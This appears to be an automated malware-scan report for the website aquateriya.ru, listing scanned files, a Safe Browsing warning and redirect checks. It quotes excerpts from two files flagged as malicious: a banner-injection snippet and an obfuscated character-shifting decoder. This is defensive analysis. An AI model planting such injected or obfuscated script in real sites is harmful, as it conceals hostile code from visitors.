Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aquateriya.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://aquateriya.ru/ | 200 OK Content-Length: 57320 Content-Type: text/html | clean |
http://aquateriya.ru/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: application/javascript | clean |
http://aquateriya.ru/src/ulightbox/ulightbox.js | 200 OK Content-Length: 20752 Content-Type: application/javascript | clean |
http://aquateriya.ru/src/35a37cb.js | 200 OK Content-Length: 225282 Content-Type: application/javascript | clean |
http://aquateriya.ru/images/qevusa.js | 200 OK Content-Length: 112065 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\ if (!mdom) { newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>"; if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); } } } Antivirus reports:
| ||
http://aquateriya.ru/js/site_script.js | 200 OK Content-Length: 10891 Content-Type: application/javascript | clean |
http://aquateriya.ru/68sb0mshonu6s604nzfi1g130iar6rf9 | 200 OK Content-Length: 2485 Content-Type: text/javascript | clean |
http://aquateriya.ru/highslide/highslide.js | 200 OK Content-Length: 45154 Content-Type: application/javascript | clean |
http://aquateriya.ru/forum/53-17-0-17 | 200 OK Content-Length: 22116 Content-Type: text/html | clean |
http://aquateriya.ru/forum/ | 200 OK Content-Length: 56763 Content-Type: text/html | clean |
http://aquateriya.ru/forum | 200 OK Content-Length: 56763 Content-Type: text/html | clean |
http://aquateriya.ru/index/3 | 200 OK Content-Length: 30628 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ava(t){if (t==1){document.adduser.avatar.disabled=true;document.adduser.avatar.style.display='none';document.adduser.avau.style.display='';document.adduser.avau.disabled=false;document.getElementById('ava1').innerHTML='(GIF, JPEG)';}else {document.adduser.avau.disabled=true;document.adduser.avau.style.display='none';document.adduser.avatar.style.display='';document.adduser.avatar.disabled=false;document.getElementById('ava1').innerHTML='(www адÑеÑ)';window.open('/index/7','Avatars','top=0,left=0,width=700,height=550');}}var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('@mrtyx$x}tiA&lmhhir&$reqiA&wsw&$zepyiA&7=<779==&$3B4'); Antivirus reports:
| ||
http://aquateriya.ru/index/ | 200 OK Content-Length: 57040 Content-Type: text/html | clean |
http://aquateriya.ru/publ | 200 OK Content-Length: 25655 Content-Type: text/html | clean |
http://aquateriya.ru/index/0-2 | 200 OK Content-Length: 30198 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aquateriya.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Aug 2014 23:02:20 GMT
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.4.6-1ubuntu1.4
GET / HTTP/1.1
Host: aquateriya.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Aug 2014 23:02:20 GMT
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.4.6-1ubuntu1.4
Second query (visit from search engine):
GET / HTTP/1.1
Host: aquateriya.ru
Referer: http://www.google.com/search?q=aquateriya.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aquateriya.ru
Referer: http://www.google.com/search?q=aquateriya.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.